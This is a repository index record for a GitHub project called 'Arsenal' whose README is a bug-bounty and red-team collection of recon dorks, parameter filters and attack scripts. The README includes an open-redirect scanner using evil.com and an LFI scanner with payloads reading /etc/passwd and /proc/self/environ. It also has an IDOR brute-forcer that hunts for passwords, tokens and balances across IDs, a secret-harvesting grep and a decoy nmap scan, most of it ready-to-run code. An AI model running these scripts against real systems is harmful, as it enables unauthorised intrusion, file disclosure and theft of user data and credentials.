{"id":24200146,"url":"https://github.com/vulnpire/arsenal","last_synced_at":"2025-09-21T23:32:33.119Z","repository":{"id":251591673,"uuid":"837855445","full_name":"Vulnpire/Arsenal","owner":"Vulnpire","description":"Collection of tools, scripts, one-liners, templates, dorks and more","archived":false,"fork":false,"pushed_at":"2025-01-02T07:14:49.000Z","size":12146,"stargazers_count":6,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"c2","last_synced_at":"2025-01-02T08:23:07.769Z","etag":null,"topics":["bug-bounty","payloads","recon","red-team"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Vulnpire.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-08-04T08:37:44.000Z","updated_at":"2025-01-02T07:14:52.000Z","dependencies_parsed_at":"2024-09-13T22:33:02.189Z","dependency_job_id":"5fdd5cc0-3d51-404c-8b02-acfa63a2ad67","html_url":"https://github.com/Vulnpire/Arsenal","commit_stats":null,"previous_names":["vulnpire/arsenal"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Vulnpire%2FArsenal","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Vulnpire%2FArsenal/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Vulnpire%2FArsenal/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Vulnpire%2FArsenal/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Vulnpire","download_url":"https://codeload.github.com/Vulnpire/Arsenal/tar.gz/refs/heads/c2","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":233808279,"owners_count":18733554,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug-bounty","payloads","recon","red-team"],"created_at":"2025-01-13T20:41:17.787Z","updated_at":"2025-09-21T23:32:33.110Z","avatar_url":"https://github.com/Vulnpire.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Arsenal\n\n## Uncover\n\n```uncover -silent -s 'ssl.cert.subject.CN:\"target.com\" -http.title:\"Invalid URL\" -http.title:\"ERROR: The request could not be satisfied\"' | sort -u```\n\n## Uncover 2\n\n```uncover -q 'target.com' -e \"shodan, shodanIb, hunterio, criminalip, Zoomeye, Censys, netlas, fullhunt, hunterhow, publicwww\" -silent```\n\n## Uncover Wildcards\n\n```for i in `cat wildcards.txt`; do uncover -l 6000 -silent -s \"ssl.cert.subject.CN:\\\"$i\\\"\" | grep -E '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' | sort -u | anew ips.txt; done```\n\n## ASNs Google Dork\n\n```site:ipinfo.io \"Steam\"```\n\n## Create IIS Wordlist\n\n```egrep -ri ^WEB /opt/useful/SecLists/ | sed 's/^[^:]*://' | anew list.txt```\n\n#\n\n# One-liners\n\n## SQLI Prone Params\n\n`cat uri.txt | uro | sort -u | grep -Ei '\\?(id|param|order_id|cat_id|form|form_id|sid|cat|category|pid|action)='`\n\n## XSS Prone Params\n\n`cat uri.txt | uro | sort -u | grep -Ei '\\?(name|query|search|keyword|username|email|message|comment|body|input|value|arg|data|q|param|lang|s)='`\n\n## Open Redirect Prone Params\n\n`cat uri.txt | uro | sort -u | grep -Ei '\\?(url|uri|path|dest|destination|redir|redirect_uri|redirect_url|redirect|forward|callback|continue|link|next|return|goto|rurl|target|out|view|ref|feed|data|port|domain|load|site|source|window|dir|show|navigation|open|file|val|validate|loginto|image_url|go|returnTo|return_to|checkout_url|reference|page|host)='`\n\n## Automate Open Redirect\n\n```\nif [ \"$#\" -ne 1 ]; then\n    echo \"Usage: $0 \u003cinput_file_with_parameters\u003e\"\n    exit 1\nfi\n\ninput_file=\"$1\"\n\nuser_agent=\"Mozilla/5.0 (compatible; OpenRedirectHunter/1.0)\"\n\nevil_url=\"https://evil.com\"\n\noutput_file=\"open_redirect_results.txt\"\n\n\u003e \"$output_file\"\n\nwhile read url; do\n    response=$(curl -s -L -A \"$user_agent\" -o /dev/null -w \"%{url_effective}\" \"$url=$evil_url\")\n\n    if [[ \"$response\" == *\"$evil_url\"* ]]; then\n        echo \"[+] Open Redirect Found: $url\" | anew -q \"$output_file\"\n    fi\ndone \u003c \"$input_file\"\n\necho \"Open Redirect Scan Completed. Results saved to $output_file\"\n```\n\n## Sensitive Files and Directories\n\n`cat uri.txt | uro | sort -u | grep -Ei 'admin|dashboard|panel|phpmyadmin|wp-admin|confluence|secureadmin|sitemanager|drupal|config|myadmin|sqladmin|grafana|kibana|metrics|backup|api|zabbix|prometheus|splunk|database|phppgadmin|ghost|joomla'`\n\n## Common backup, logs, and configuration files, vulnerable endpoints\n\n`cat uri.txt | uro | sort -u | sort -u | grep -Ei '(\\.git|\\.svn|\\.backup|\\.env|\\.bak|\\.old|\\.log|\\.conf|\\.config|\\.ini|\\.sql|\\.dump|xmlrpc\\.php|_fragment|env\\.js|\\.gitlab-ci\\.yml|\\.cgf|\\.xml|\\.xls|\\.xlsx|\\.json|\\.war|\\.ear|\\.sqlitedb|\\.sqlite3|\\.properties|\\.pem|\\.key|tar\\.gz|.\\py|\\.sh)$'`\n\n## Common patterns for file inclusion and directory traversal\n\n`cat uri.txt | uro | sort -u | grep -Ei '\\?(file|page|path|doc|folder|dir|inc|locate|conf)='`\n\n## Automate LFI\n\n```\nif [ \"$#\" -ne 1 ]; then\n    echo \"Usage: $0 \u003cinput_file_with_parameters\u003e\"\n    exit 1\nfi\n\ninput_file=\"$1\"\n\nuser_agent=\"Mozilla/5.0 (compatible; LFIHunter/1.0)\"\n\nlfi_payloads=(\"../../../../etc/passwd\" \"../../../../../../../../etc/passwd\" \"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini\" \"../../../../../../../../etc/hosts\" \"../../../../../../../../proc/self/environ\")\n\noutput_file=\"lfi_results.txt\"\n\n\u003e \"$output_file\"\n\nwhile read url; do\n    for payload in \"${lfi_payloads[@]}\"; do\n        response=$(curl -s -A \"$user_agent\" \"$url=$payload\")\n\n        if [[ \"$response\" == *\"root:x:\"* || \"$response\" == *\"[extensions]\"* || \"$response\" == *\"localhost\"* || \"$response\" == *\"USER_AGENT\"* ]]; then\n            echo \"[+] LFI Found: $url with payload: $payload\" | anew -q \"$output_file\"\n            break\n        fi\n    done\ndone \u003c \"$input_file\"\n\necho \"LFI Scan Completed. Results saved to $output_file\"\n```\n\n## Common parameters for session management\n\n`cat uri.txt | uro | sort -u | grep -Ei '\\?(token|auth|session|sid|csrf|xsrf)='`\n\n## Common parameters used in command injection\n\n`cat uri.txt | sort -u | grep -Ei '\\?(cmd|exec|command|run|execute|shell)='`\n\n## Regex for API Enumeration\n\n`cat uri.txt | sort -u | grep -Ei '/api/v[1-3]/[a-z]+/[0-9]+|/api/[0-9]+/[a-z]+/[0-9]+|/v[0-9]+/[a-z]+/[0-9]+|/rest(/v[0-9]+)?/|/graphql|/swagger|/auth|/internal/create/get/post|'`\n\n## IDOR Prone Endpoints \u0026 Params\n\n`cat uri.txt | sort -u | grep -Ei '(user|order|product|api|invoice|account|profile)/[0-9]+|[a-fA-F0-9-]{36}|\\?invoice=|changepassword\\?user=|showImage|accessPage\\?menuitem=|user_id=|file_id=|MyPictureList=|profile_id=|account_id=|order_id=|page_id=|product_id=|session_id=|invoice_id=|doc_id='`\n\n## Automate IDOR\n\n```\nif [ \"$#\" -ne 1 ]; then\n    echo \"Usage: $0 \u003cinput_file_with_parameters\u003e\"\n    exit 1\nfi\n\ninput_file=\"$1\"\n\nuser_agent=\"Mozilla/5.0 (compatible; IDORHunter/1.0)\"\n\nstart_id=1\nend_id=1000\n\nkeywords=(\"username\" \"email\" \"admin\" \"user_id\" \"password\" \"token\" \"session\" \"profile\" \"account\" \"balance\" \"order\" \"invoice\" \"credit\" \"data\" \"info\" \"details\" \"access\" \"role\" \"customer\" \"user\" \"client\")\n\noutput_file=\"idor_results.txt\"\n\n\u003e \"$output_file\"\n\nwhile read url; do\n    for i in $(seq $start_id $end_id); do\n        response=$(curl -s -A \"$user_agent\" \"$url=$i\")\n\n        for keyword in \"${keywords[@]}\"; do\n            if [[ \"$response\" == *\"$keyword\"* ]]; then\n                echo \"[+] Possible IDOR at: $url=$i (Found: $keyword)\" | anew -q \"$output_file\"\n                break\n            fi\n        done\n    done\ndone \u003c \"$input_file\"\n\necho \"IDOR Scan Completed. Results saved to $output_file\"\n```\n\n## Regex for XXE\n\n`cat uri.txt | sort -u | grep -Ei \"(xml|data|content|file|input|entity|config|document|payload|request)=\"`\n\n## Regex for SSTI\n\n`cat uri.txt | sort -u | grep -Ei \"(template|name|message|user|description|email|subject|content|query|title)=\"`\n\n## Fast Nmap Scan\n\n`ports=$(nmap -p- --min-rate=1000 -T4 -Pn $IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\\n' ',' | sed s/,$//) \u0026\u0026 nmap -p$ports -sC -sV -D RND:13.37.73.31 -Pn $IP --min-rate=500 -T4`\n\n## Automate API Keys\n\n```\nif [ \"$#\" -ne 1 ]; then\n    echo \"Usage: $0 \u003cinput_file_with_js_paths\u003e\"\n    exit 1\nfi\n\ninput_file=\"$1\"\n\nkeywords=(\"api_key\" \"token\" \"secret\" \"client_id\" \"authorization\" \"access_key\" \"private_key\" \"bearer\" \"aws_secret\" \"auth\")\n\noutput_file=\"api_keys.txt\"\n\n\u003e \"$output_file\"\n\nwhile read js_file; do\n    for keyword in \"${keywords[@]}\"; do\n        grep -E -i \"$keyword\" \"$js_file\" \u003e\u003e \"$output_file\"\n    done\ndone \u003c \"$input_file\"\n\nsort -u \"$output_file\" -o \"$output_file\"\n\necho \"API Key Scan Completed. Results saved to $output_file\"\n```\n\n## Create wordlist for DNS brute-forcing\n\n```\nsubfinder -d target.com -silent | httpx -silent | wraith -subs -crawl-js | tr '[:punct:]' '\\n' | sort -u\n```\n\n## Search for default creds\n\n```\npip3 install defaultcreds-cheat-sheet\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvulnpire%2Farsenal","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvulnpire%2Farsenal","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvulnpire%2Farsenal/lists"}